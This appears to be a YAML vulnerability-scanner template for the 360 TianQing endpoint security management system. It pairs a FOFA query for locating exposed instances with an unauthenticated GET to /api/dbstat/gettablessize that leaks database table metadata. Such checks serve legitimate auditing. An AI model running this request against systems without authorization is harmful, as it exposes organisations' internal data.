product: 360-TianQing
vName: 360天擎 gettablessize 数据库信息泄露
type: 信息泄露
vID: [ ]
level: 3
vDesc: 360天擎 存在未授权越权访问，造成敏感信息泄露
version: 天擎
note: ''
search:
  FOFA: app="360天擎终端安全管理系统"
protocol: http
link: ''
fix:
  - 升级到最新版本
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /api/dbstat/gettablessize
    verify:
      path: ''
      logic: and
      check:
        - status: 200
        - body:
            value:
              - schema_name
              - table_name
              - table_size
            logic: and